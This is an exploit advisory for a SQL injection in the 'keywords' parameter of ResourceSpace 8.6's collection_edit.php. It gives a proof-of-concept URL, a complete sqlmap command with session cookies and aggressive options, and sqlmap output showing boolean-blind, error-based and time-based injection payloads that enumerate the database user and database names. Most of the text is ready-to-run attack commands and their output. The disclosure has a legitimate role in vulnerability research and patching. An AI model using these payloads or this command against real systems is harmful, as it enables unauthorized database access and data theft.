ResourceSpace 8.6 SQL Injection

ResourceSpace versions 8.6 and below suffer from a remote SQL injection vulnerability.


MD5 | 7271979c518baa0a85220968f7523ac9

# Exploit Title: ResourceSpace <=8.6 'collection_edit.php' SQL Injection
# Dork: N/A
# Date: 2019-01-25
# Exploit Author: dd_ ([email protected])
# Vendor Homepage: https://www.resourcespace.com/
# Software Link: https://www.resourcespace.com/get
# Version: Stable release: 8.6
# Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
# Vendor Alerted: 1/21/2019
# Vendor Banner: ResourceSpace open source digital asset management software is the simple, fast, & free way to organise your digital assets.


# POC:
# 1)
# http://localhost/pages/collection_edit.php?CSRFToken=[CRSF_TOKEN_HERE]&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=[SQL]&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0




# Running the SQLMap command:

sqlmap -u 'http://localhost/pages/collection_edit.php' --data='CSRFToken=<csrf token>&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=*&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0' --cookie='language=en-US;language=en-US;thumbs=show;user=3154df279ea69a45caeaccf8a5fd1550;saved_col_order_by=created;saved_col_sort=ASC;per_page_list=15;saved_themes_order_by=name;saved_themes_sort=ASC;display=thumbs;per_page=48;saved_sort=DESC;geobound=-5244191.6358594%2C-786628.3871876%2C4;plupload_ui_view=list;ui_view_full_site=true' --dbms=mysql --level=5 --risk=3 -p keywords --technique=ETB --dbs --current-user --current-db --is-dba




# Will trigger the following injection methods:


[*] starting @ 13:21:45 /2019-01-25/

[13:21:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keywords (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' RLIKE (SELECT (CASE WHEN (6076=6076) THEN 0x3125323532372532353246253235324125323532412532353246524c494b452532353246253235324125323532412532353246253235323853454c454354253235324625323532412532353241253235324625323532384341534525323532462532353241253235324125323532465748454e253235324625323532412532353241253235324625323532384f524425323532384d49442532353238253235323853454c454354253235324625323532412532353241253235324649464e554c4c2532353238434153542532353238434f554e54253235323844495354494e43542532353238736368656d615f6e616d65253235323925323532392532353246253235324125323532412532353246415325323532462532353241253235324125323532464348415225323532392532353243307832302532353239253235324625323532412532353241253235324646524f4d2532353246253235324125323532412532353246494e464f524d4154494f4e5f534348454d412e534348454d41544125323532392532353243312532353243312532353239253235323925323533453536253235323925323532462532353241253235324125323532465448454e2532353246253235324125323532412532353246312532353246253235324125323532412532353246454c53452532353246253235324125323532412532353246307832382532353246253235324125323532412532353246454e44253235323925323532392532353246253235324125323532412532353246414e4425323532462532353241253235324125323532462532353237534a584e253235323725323533442532353237534a584e ELSE 0x28 END)) AND 'HDWY'='HDWY&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' AND EXTRACTVALUE(8779,CONCAT(0x5c,0x716b786a71,(SELECT (ELT(8779=8779,1))),0x7176626271)) AND 'cjUk'='cjUk&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' RLIKE SLEEP(5) AND 'EqqU'='EqqU&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0
---
[13:21:47] [INFO] testing MySQL
[13:21:47] [INFO] confirming MySQL
[13:21:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.0
[13:21:48] [INFO] fetching current user
[13:21:50] [INFO] retrieved: 'pwner@localhost'
current user: 'pwner@localhost'
[13:21:50] [INFO] fetching current database
[13:21:52] [INFO] retrieved: 'resourcespace'
current database: 'resourcespace'
[13:21:52] [INFO] testing if current user is DBA
[13:21:52] [INFO] fetching current user
current user is DBA: False
[13:21:53] [INFO] fetching database names
[13:21:54] [WARNING] the SQL query provided does not return any output
[13:21:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:21:54] [INFO] fetching number of databases
[13:21:54] [INFO] resumed: 6
[13:21:54] [INFO] resumed: information_schema
[13:21:54] [INFO] resumed: mysql
[13:21:54] [INFO] resumed: performance_schema
[13:21:54] [INFO] resumed: phpmyadmin
[13:21:54] [INFO] resumed: resourcespace
[13:21:54] [INFO] resumed: sys
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] resourcespace
[*] sys

[13:21:54] [INFO] fetched data logged to text files under '/home/notroot/.sqlmap/output/localhost'

[*] ending @ 13:21:54 /2019-01-25/


Related Posts